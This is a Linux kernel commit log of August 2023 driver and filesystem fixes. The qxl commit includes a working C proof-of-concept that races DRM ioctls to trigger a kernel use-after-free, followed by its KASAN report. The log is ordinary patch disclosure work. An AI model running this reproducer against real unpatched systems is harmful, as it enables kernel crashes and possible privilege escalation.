Tony Nguyen says: ==================== Intel Wired LAN Driver Updates 2023-08-16 (iavf, i40e) This series contains updates to iavf and i40e drivers. Piotr adds checks for unsupported Flow Director rules on iavf. Andrii replaces incorrect 'write' messaging on read operations for i40e. * '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue: i40e: fix misleading debug logs iavf: fix FDIR rule fields masks validation ==================== Link: https://lore.kernel.org/r/20230816193308.1307535-1-anthony.l.nguyen@intel.com Signed-off-by: Jakub Kicinski <kuba@kernel.org> |
||
|
Wander Lairson Costa
|
c611589b42 |
drm/qxl: fix UAF on handle creation
qxl_mode_dumb_create() dereferences the qobj returned by
qxl_gem_object_create_with_handle(), but the handle is the only one
holding a reference to it.
A potential attacker could guess the returned handle value and closes it
between the return of qxl_gem_object_create_with_handle() and the qobj
usage, triggering a use-after-free scenario.
Reproducer:
int dri_fd =-1;
struct drm_mode_create_dumb arg = {0};
void gem_close(int handle);
void* trigger(void* ptr)
{
int ret;
arg.width = arg.height = 0x20;
arg.bpp = 32;
ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
if(ret)
{
perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
exit(-1);
}
gem_close(arg.handle);
while(1) {
struct drm_mode_create_dumb args = {0};
args.width = args.height = 0x20;
args.bpp = 32;
ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
if (ret) {
perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
exit(-1);
}
printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
gem_close(args.handle);
}
return NULL;
}
void gem_close(int handle)
{
struct drm_gem_close args;
args.handle = handle;
int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
if (!ret)
printf("gem close handle %d\n", args.handle);
}
int main(void)
{
dri_fd= open("/dev/dri/card0", O_RDWR);
printf("fd:%d\n", dri_fd);
if(dri_fd == -1)
return -1;
pthread_t tid1;
if(pthread_create(&tid1,NULL,trigger,NULL)){
perror("[*] thread_create tid1\n");
return -1;
}
while (1)
{
gem_close(arg.handle);
}
return 0;
}
This is a KASAN report:
==================================================================
BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
Write of size 1 at addr ffff88801136c240 by task poc/515
CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
Call Trace:
<TASK>
__dump_stack linux/lib/dump_stack.c:88
dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
print_address_description linux/mm/kasan/report.c:319
print_report+0xd2/0x660 linux/mm/kasan/report.c:430
kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
__asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
vfs_ioctl linux/fs/ioctl.c:51
__do_sys_ioctl linux/fs/ioctl.c:870
__se_sys_ioctl linux/fs/ioctl.c:856
__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
do_syscall_x64 linux/arch/x86/entry/common.c:50
do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
RIP: 0033:0x7ff5004ff5f7
Code: 00 00 00 48 8b 05 99 c8 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 69 c8 0d 00 f7 d8 64 89 01 48
RSP: 002b:00007ff500408ea8 EFLAGS: 00000286 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5004ff5f7
RDX: 00007ff500408ec0 RSI: 00000000c02064b2 RDI: 0000000000000003
RBP: 00007ff500408ef0 R08: 0000000000000000 R09: 000000000000002a
R10: 0000000000000000 R11: 0000000000000286 R12: 00007fff1c6cdafe
R13: 00007fff1c6cdaff R14: 00007ff500408fc0 R15: 0000000000802000
</TASK>
Allocated by task 515:
kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
____kasan_kmalloc linux/mm/kasan/common.c:374
__kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
kasan_kmalloc linux/./include/linux/kasan.h:196
kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
kmalloc linux/./include/linux/slab.h:580
kzalloc linux/./include/linux/slab.h:720
qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
vfs_ioctl linux/fs/ioctl.c:51
__do_sys_ioctl linux/fs/ioctl.c:870
__se_sys_ioctl linux/fs/ioctl.c:856
__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
do_syscall_x64 linux/arch/x86/entry/common.c:50
do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
Freed by task 515:
kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
____kasan_slab_free linux/mm/kasan/common.c:236
____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
__kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
kasan_slab_free linux/./include/linux/kasan.h:162
slab_free_hook linux/mm/slub.c:1781
slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
slab_free linux/mm/slub.c:3787
__kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
kfree+0x78/0x120 linux/mm/slab_common.c:1019
qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
kref_put linux/./include/linux/kref.h:65
ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
kref_put linux/./include/linux/kref.h:65
__drm_gem_object_put linux/./include/drm/drm_gem.h:431
drm_gem_object_put linux/./include/drm/drm_gem.h:444
qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
vfs_ioctl linux/fs/ioctl.c:51
__do_sys_ioctl linux/fs/ioctl.c:870
__se_sys_ioctl linux/fs/ioctl.c:856
__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
do_syscall_x64 linux/arch/x86/entry/common.c:50
do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
The buggy address belongs to the object at ffff88801136c000
which belongs to the cache kmalloc-1k of size 1024
The buggy address is located 576 bytes inside of
freed 1024-byte region [ffff88801136c000, ffff88801136c400)
The buggy address belongs to the physical page:
page:0000000089fc329b refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11368
head:0000000089fc329b order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff)
raw: 000fffffc0010200 ffff888007841dc0 dead000000000122 0000000000000000
raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff88801136c100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff88801136c180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
>ffff88801136c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
^
ffff88801136c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff88801136c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
Disabling lock debugging due to kernel taint
Instead of returning a weak reference to the qxl_bo object, return the
created drm_gem_object and let the caller decrement the reference count
when it no longer needs it. As a convenience, if the caller is not
interested in the gobj object, it can pass NULL to the parameter and the
reference counting is descremented internally.
The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).
Link: https://www.zerodayinitiative.com/
Signed-off-by: Wander Lairson Costa <wander@redhat.com>
Cc: stable@vger.kernel.org
Reviewed-by: Dave Airlie <airlied@redhat.com>
Signed-off-by: Dave Airlie <airlied@redhat.com>
Link: https://patchwork.freedesktop.org/patch/msgid/20230814165119.90847-1-wander@redhat.com
|
||
|
Dave Airlie
|
68c60b3433 |
amd-drm-fixes-6.5-2023-08-16:
amdgpu: - SMU 13.x fixes - Fix mcbp parameter for gfx9 - SMU 11.x fixes - Temporary fix for large numbers of XCP partitions - S0ix fixes - DCN 2.0 fix -----BEGIN PGP SIGNATURE----- iHUEABYKAB0WIQQgO5Idg2tXNTSZAr293/aFa7yZ2AUCZN0pwAAKCRC93/aFa7yZ 2Pm5AQCWBRQ8olFSd6w+hfuXu3E/m/nIalEMb2CAyUtvUeSJYQEAhh0FpkpcOBKG /Ya8fMz5R/FIHvzoHHga0V2ceEt67wg= =Alen -----END PGP SIGNATURE----- Merge tag 'amd-drm-fixes-6.5-2023-08-16' of https://gitlab.freedesktop.org/agd5f/linux into drm-fixes amd-drm-fixes-6.5-2023-08-16: amdgpu: - SMU 13.x fixes - Fix mcbp parameter for gfx9 - SMU 11.x fixes - Temporary fix for large numbers of XCP partitions - S0ix fixes - DCN 2.0 fix Signed-off-by: Dave Airlie <airlied@redhat.com> From: Alex Deucher <alexander.deucher@amd.com> Link: https://patchwork.freedesktop.org/patch/msgid/20230816200226.10771-1-alexander.deucher@amd.com |
||
|
Dave Airlie
|
be48306f76 |
One EPROBE_DEFER handling fix for the JDI LT070ME05000, a timing fix for
the AUO G121EAN01 panel, an integer overflow and a memory leak fixes for the qaic accel, a use-after-free fix for nouveau and a revert for an alleged fix in EDID parsing. -----BEGIN PGP SIGNATURE----- iHUEABYKAB0WIQRcEzekXsqa64kGDp7j7w1vZxhRxQUCZN4izwAKCRDj7w1vZxhR xRxGAP4h+R+qhB1X4SVmCB8DEY109lcHJofNK/z7aW8EG8X4sQEAlb1cOZRtmRjS 9/Wdmc7377soNHNlMNhxEg8kEeqxGwE= =c6Zn -----END PGP SIGNATURE----- Merge tag 'drm-misc-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-misc into drm-fixes One EPROBE_DEFER handling fix for the JDI LT070ME05000, a timing fix for the AUO G121EAN01 panel, an integer overflow and a memory leak fixes for the qaic accel, a use-after-free fix for nouveau and a revert for an alleged fix in EDID parsing. Signed-off-by: Dave Airlie <airlied@redhat.com> From: Maxime Ripard <mripard@redhat.com> Link: https://patchwork.freedesktop.org/patch/msgid/3olqt33em5uhxzjbqghwcwnvmw73h7bxkbdxookmnkecymd4vc@7ogm6gewpprq |
||
|
Dave Airlie
|
dd64d8ae0f |
- Fix the flow for ignoring GuC SLPC efficient frequency selection (Vinay)
- Fix SDVO panel_type initialization (Jani) - Fix display probe for IVB Q and IVB D GT2 server (Jani) -----BEGIN PGP SIGNATURE----- iQEzBAABCAAdFiEEbSBwaO7dZQkcLOKj+mJfZA7rE8oFAmTeMewACgkQ+mJfZA7r E8qILgf/cvNbXxfp0D0oqpMOQxj9b0yBZ1IFNwXtyDBRHpfZaSYOgkxhh0ybcGei p15AOwk96hET5wo2KmBsq6JakjBU7GNfRtFISOQBPevo4pFPSKO/XZTOFzp7Wb2M eqDI9EVaedGRqV+oEiRfr1XpCPunIDg7jaCC1Fl/aD+iX93GO1ExuiPgHJNdIA36 KfqVF9bgDupt9foCzPktJpwglG1xIOXCphXUogZ+15FtIfvgFvPhIGnDBVoTH9av A1kr8d114K+VPT1YqfdrgNHMw4doHcejcnNxESn0kXI2KptCKhgBHAr/93ytMz9r mix3VDSvBIWLtj18ca61BbtLKL7org== =Bx6T -----END PGP SIGNATURE----- Merge tag 'drm-intel-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-intel into drm-fixes - Fix the flow for ignoring GuC SLPC efficient frequency selection (Vinay) - Fix SDVO panel_type initialization (Jani) - Fix display probe for IVB Q and IVB D GT2 server (Jani) Signed-off-by: Dave Airlie <airlied@redhat.com> From: Rodrigo Vivi <rodrigo.vivi@intel.com> Link: https://patchwork.freedesktop.org/patch/msgid/ZN4yduyBU1Ev9dc7@intel.com |
||
|
Jakub Kicinski
|
e9bbd60169 |
mlx5-fixes-2023-08-16
-----BEGIN PGP SIGNATURE----- iQEzBAABCAAdFiEEGhZs6bAKwk/OTgTpSD+KveBX+j4FAmTdNAEACgkQSD+KveBX +j76qQf+PO4Po2ihQifANqZdJ75PumJxvHw3GUtroq0ELt2CqUx4cFwnVVoy2+6Y fYctk0UpFu5yRHkPUv5jVgP8ixDgLiJ8wLR15evCi3iDKxi0Ta/e+8EsTfKBrtI4 GXK7wYTL+awZz5QDyerkMjqDSDDJ8KBgL4p2B1jpKgPMvd5gYWxqG+6MC5b/AAFe jqZAB6vocCYH6TGRBn7Gn2b6jnWhG35HBViv+nUCjZKRpVrkNq4wbh9RfeAgOaqz 8rEBII19EnbaBj+RpJrLNgSINmv5TQCd4PY0CLkhqFYtJw6nlYEYcuMkdfi8VUO8 P2UNhznOnCtJqai0Unsz2tR6H20uzQ== =BUoK -----END PGP SIGNATURE----- Merge tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux Saeed Mahameed says: ==================== mlx5 fixes 2023-08-16 This series provides bug fixes to mlx5 driver. * tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux: net/mlx5: Fix mlx5_cmd_update_root_ft() error flow net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT ==================== Link: https://lore.kernel.org/r/20230816204108.53819-1-saeed@kernel.org Signed-off-by: Jakub Kicinski <kuba@kernel.org> |
||
|
Marcin Szycik
|
43d00e102d |
ice: Block switchdev mode when ADQ is active and vice versa
ADQ and switchdev are not supported simultaneously. Enabling both at the
same time can result in nullptr dereference.
To prevent this, check if ADQ is active when changing devlink mode to
switchdev mode, and check if switchdev is active when enabling ADQ.
Fixes:
|
||
|
Manish Chopra
|
2eb9625a3a |
qede: fix firmware halt over suspend and resume
While performing certain power-off sequences, PCI drivers are
called to suspend and resume their underlying devices through
PCI PM (power management) interface. However this NIC hardware
does not support PCI PM suspend/resume operations so system wide
suspend/resume leads to bad MFW (management firmware) state which
causes various follow-up errors in driver when communicating with
the device/firmware afterwards.
To fix this driver implements PCI PM suspend handler to indicate
unsupported operation to the PCI subsystem explicitly, thus avoiding
system to go into suspended/standby mode.
Without this fix device/firmware does not recover unless system
is power cycled.
Fixes:
|
||
|
Eric Dumazet
|
b616be6b97 |
net: do not allow gso_size to be set to GSO_BY_FRAGS
One missing check in virtio_net_hdr_to_skb() allowed
syzbot to crash kernels again [1]
Do not allow gso_size to be set to GSO_BY_FRAGS (0xffff),
because this magic value is used by the kernel.
[1]
general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]
CPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023
RIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500
Code: 00 00 00 e9 ab eb ff ff e8 6b 96 5d f9 48 8b 84 24 00 01 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e ea 21 00 00 48 8b 84 24 00 01
RSP: 0018:ffffc90003d3f1c8 EFLAGS: 00010202
RAX: dffffc0000000000 RBX: 000000000001fffe RCX: 0000000000000000
RDX: 000000000000000e RSI: ffffffff882a3115 RDI: 0000000000000070
RBP: ffffc90003d3f378 R08: 0000000000000005 R09: 000000000000ffff
R10: 000000000000ffff R11: 5ee4a93e456187d6 R12: 000000000001ffc6
R13: dffffc0000000000 R14: 0000000000000008 R15: 000000000000ffff
FS: 00005555563f2380(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020020000 CR3: 000000001626d000 CR4: 00000000003506f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<TASK>
udp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109
ipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120
skb_mac_gso_segment+0x292/0x610 net/core/gso.c:53
__skb_gso_segment+0x339/0x710 net/core/gso.c:124
skb_gso_segment include/net/gso.h:83 [inline]
validate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625
__dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329
dev_queue_xmit include/linux/netdevice.h:3082 [inline]
packet_xmit+0x257/0x380 net/packet/af_packet.c:276
packet_snd net/packet/af_packet.c:3087 [inline]
packet_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119
sock_sendmsg_nosec net/socket.c:727 [inline]
sock_sendmsg+0xd9/0x180 net/socket.c:750
____sys_sendmsg+0x6ac/0x940 net/socket.c:2496
___sys_sendmsg+0x135/0x1d0 net/socket.c:2550
__sys_sendmsg+0x117/0x1e0 net/socket.c:2579
do_syscall_x64 arch/x86/entry/common.c:50 [inline]
do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x63/0xcd
RIP: 0033:0x7ff27cdb34d9
Fixes:
|
||
|
Abel Wu
|
2d0c88e84e |
sock: Fix misuse of sk_under_memory_pressure()
The status of global socket memory pressure is updated when:
a) __sk_mem_raise_allocated():
enter: sk_memory_allocated(sk) > sysctl_mem[1]
leave: sk_memory_allocated(sk) <= sysctl_mem[0]
b) __sk_mem_reduce_allocated():
leave: sk_under_memory_pressure(sk) &&
sk_memory_allocated(sk) < sysctl_mem[0]
So the conditions of leaving global pressure are inconstant, which
may lead to the situation that one pressured net-memcg prevents the
global pressure from being cleared when there is indeed no global
pressure, thus the global constrains are still in effect unexpectedly
on the other sockets.
This patch fixes this by ignoring the net-memcg's pressure when
deciding whether should leave global memory pressure.
Fixes:
|
||
|
Edward Cree
|
54c9016eb8 |
sfc: don't fail probe if MAE/TC setup fails
Existing comment in the source explains why we don't want efx_init_tc()
failure to be fatal. Cited commit erroneously consolidated failure
paths causing the probe to be failed in this case.
Fixes:
|
||
|
Edward Cree
|
fa165e1949 |
sfc: don't unregister flow_indr if it was never registered
In efx_init_tc(), move the setting of efx->tc->up after the
flow_indr_dev_register() call, so that if it fails, efx_fini_tc()
won't call flow_indr_dev_unregister().
Fixes:
|
||
|
Mark Brown
|
2f43f549cd |
arm64/ptrace: Ensure that the task sees ZT writes on first use
When the value of ZT is set via ptrace we don't disable traps for SME.
This means that when a the task has never used SME before then the value
set via ptrace will never be seen by the target task since it will
trigger a SME access trap which will flush the register state.
Disable SME traps when setting ZT, this means we also need to allocate
storage for SVE if it is not already allocated, for the benefit of
streaming SVE.
Fixes:
|
||
|
Mark Brown
|
5d0a8d2fba |
arm64/ptrace: Ensure that SME is set up for target when writing SSVE state
When we use NT_ARM_SSVE to either enable streaming mode or change the
vector length for a process we do not currently do anything to ensure that
there is storage allocated for the SME specific register state. If the
task had not previously used SME or we changed the vector length then
the task will not have had TIF_SME set or backing storage for ZA/ZT
allocated, resulting in inconsistent register sizes when saving state
and spurious traps which flush the newly set register state.
We should set TIF_SME to disable traps and ensure that storage is
allocated for ZA and ZT if it is not already allocated. This requires
modifying sme_alloc() to make the flush of any existing register state
optional so we don't disturb existing state for ZA and ZT.
Fixes:
|
||
|
Linus Torvalds
|
16931859a6 |
nfsd-6.5 fixes:
- Fix new MSG_SPLICE_PAGES support in server's TCP sendmsg helper -----BEGIN PGP SIGNATURE----- iQIzBAABCAAdFiEEKLLlsBKG3yQ88j7+M2qzM29mf5cFAmTeKW4ACgkQM2qzM29m f5dqfRAAjLXcxSixOnFqp49echmMlG1DI493WbiXG05hJ43TspnoThIGI+GpeTBG LxADUeZuxbMor0In8qA/GzRGQjJpdL22E1EWfLUlFN7JtWjVyyeuYLSeECGskByP VxAiQ/uo50dYPcRI3YN391ec2GZ9wnrNkHbfj3X0pEZoZVDea3GPRXnUQbnb4GVS Xj433F1pmPfl7EFNWCSuMcb3OPjG1uzcbYWF6+1RjaLZ02QrgzvwmU4bMePGHRga PsFGBaBdVJi6Dkv41NhsAflsg6DjZnzyuHnH8N6EygMz4py3kess9TRux1J9g22f j+o/GM+U1r66YXdhMhg1kiYApemRCybrmzFgn0B9dtYC7r4MiHVVRQFgAoa95teo g4iDQ/jxJOJMFm8ipXM/bOgMcznJfcHBX2pG2cN+qXZyPQnCn+luh81JI2s5pvqf yAJ/uThL6cWdyLoM+ZBvozpfPn9QTwwqDWMtZlbVkIz/nM6kiJjdUrl2NDBpaDhq WGd3CP6GWgxoCbURpfBJPLytjhb00Bep7xRm6BZavt/XSOHRWJdhEachVyWt/zFI 6zLOMHv9A7rPTBigFAIgdfZzIL9c+StdpW3oEafWovwTBKW537W+m680tdLQK44q yl2EmeG2Z3hpqbRnDPiV5XCJ7ijArFslBBuZB6mwDCPKcbMs3FQ= =jfUp -----END PGP SIGNATURE----- Merge tag 'nfsd-6.5-4' of git://git.kernel.org/pub/scm/linux/kernel/git/cel/linux Pull nfsd fix from Chuck Lever: - Fix new MSG_SPLICE_PAGES support in server's TCP sendmsg helper * tag 'nfsd-6.5-4' of git://git.kernel.org/pub/scm/linux/kernel/git/cel/linux: sunrpc: set the bv_offset of first bvec in svc_tcp_sendmsg |
||
|
xiaoshoukui
|
29eefa6d0d |
btrfs: fix BUG_ON condition in btrfs_cancel_balance
Pausing and canceling balance can race to interrupt balance lead to BUG_ON
panic in btrfs_cancel_balance. The BUG_ON condition in btrfs_cancel_balance
does not take this race scenario into account.
However, the race condition has no other side effects. We can fix that.
Reproducing it with panic trace like this:
kernel BUG at fs/btrfs/volumes.c:4618!
RIP: 0010:btrfs_cancel_balance+0x5cf/0x6a0
Call Trace:
<TASK>
? do_nanosleep+0x60/0x120
? hrtimer_nanosleep+0xb7/0x1a0
? sched_core_clone_cookie+0x70/0x70
btrfs_ioctl_balance_ctl+0x55/0x70
btrfs_ioctl+0xa46/0xd20
__x64_sys_ioctl+0x7d/0xa0
do_syscall_64+0x38/0x80
entry_SYSCALL_64_after_hwframe+0x63/0xcd
Race scenario as follows:
> mutex_unlock(&fs_info->balance_mutex);
> --------------------
> .......issue pause and cancel req in another thread
> --------------------
> ret = __btrfs_balance(fs_info);
>
> mutex_lock(&fs_info->balance_mutex);
> if (ret == -ECANCELED && atomic_read(&fs_info->balance_pause_req)) {
> btrfs_info(fs_info, "balance: paused");
> btrfs_exclop_balance(fs_info, BTRFS_EXCLOP_BALANCE_PAUSED);
> }
CC: stable@vger.kernel.org # 4.19+
Signed-off-by: xiaoshoukui <xiaoshoukui@ruijie.com.cn>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
|
||
|
Chris Mason
|
09c3717c3a |
btrfs: only subtract from len_to_oe_boundary when it is tracking an extent
bio_ctrl->len_to_oe_boundary is used to make sure we stay inside a zone as we submit bios for writes. Every time we add a page to the bio, we decrement those bytes from len_to_oe_boundary, and then we submit the bio if we happen to hit zero. Most of the time, len_to_oe_boundary gets set to U32_MAX. submit_extent_page() adds pages into our bio, and the size of the bio ends up limited by: - Are we contiguous on disk? - Does bio_add_page() allow us to stuff more in? - is len_to_oe_boundary > 0? The len_to_oe_boundary math starts with U32_MAX, which isn't page or sector aligned, and subtracts from it until it hits zero. In the non-zoned case, the last IO we submit before we hit zero is going to be unaligned, triggering BUGs. This is hard to trigger because bio_add_page() isn't going to make a bio of U32_MAX size unless you give it a perfect set of pages and fully contiguous extents on disk. We can hit it pretty reliably while making large swapfiles during provisioning because the machine is freshly booted, mostly idle, and the disk is freshly formatted. It's also possible to trigger with reads when read_ahead_kb is set to 4GB. The code has been clean up and shifted around a few times, but this flaw has been lurking since the counter was added. I think the commit |
||
|
Anand Jain
|
b471965fdb |
btrfs: fix replace/scrub failure with metadata_uuid
Fstests with POST_MKFS_CMD="btrfstune -m" (as in the mailing list)
reported a few of the test cases failing.
The failure scenario can be summarized and simplified as follows:
$ mkfs.btrfs -fq -draid1 -mraid1 /dev/sdb1 /dev/sdb2 :0
$ btrfstune -m /dev/sdb1 :0
$ wipefs -a /dev/sdb1 :0
$ mount -o degraded /dev/sdb2 /btrfs :0
$ btrfs replace start -B -f -r 1 /dev/sdb1 /btrfs :1
STDERR:
ERROR: ioctl(DEV_REPLACE_START) failed on "/btrfs": Input/output error
[11290.583502] BTRFS warning (device sdb2): tree block 22036480 mirror 2 has bad fsid, has 99835c32-49f0-4668-9e66-dc277a96b4a6 want da40350c-33ac-4872-92a8-4948ed8c04d0
[11290.586580] BTRFS error (device sdb2): unable to fix up (regular) error at logical 22020096 on dev /dev/sdb8 physical 1048576
As above, the replace is failing because we are verifying the header with
fs_devices::fsid instead of fs_devices::metadata_uuid, despite the
metadata_uuid actually being present.
To fix this, use fs_devices::metadata_uuid. We copy fsid into
fs_devices::metadata_uuid if there is no metadata_uuid, so its fine.
Fixes:
|
||
|
Arnd Bergmann
|
6e8d96909a |
asm-generic: partially revert "Unify uapi bitsperlong.h for arm64, riscv and loongarch"
Unifying the asm-generic headers across 32-bit and 64-bit architectures
based on the compiler provided macros was a good idea and appears to work
with all user space, but it caused a regression when building old kernels
on systems that have the new headers installed in /usr/include, as this
combination trips an inconsistency in the kernel's own tools/include
headers that are a mix of userspace and kernel-internal headers.
This affects kernel builds on arm64, riscv64 and loongarch64 systems that
might end up using the "#define __BITS_PER_LONG 32" default from the old
tools headers. Backporting the commit into stable kernels would address
this, but it would still break building kernels without that backport,
and waste time for developers trying to understand the problem.
arm64 build machines are rather common, and on riscv64 this can also
happen in practice, but loongarch64 is probably new enough to not
be used much for building old kernels, so only revert the bits
for arm64 and riscv.
Link: https://lore.kernel.org/all/20230731160402.GB1823389@dev-arch.thelio-3990X/
Reported-by: Nathan Chancellor <nathan@kernel.org>
Fixes:
|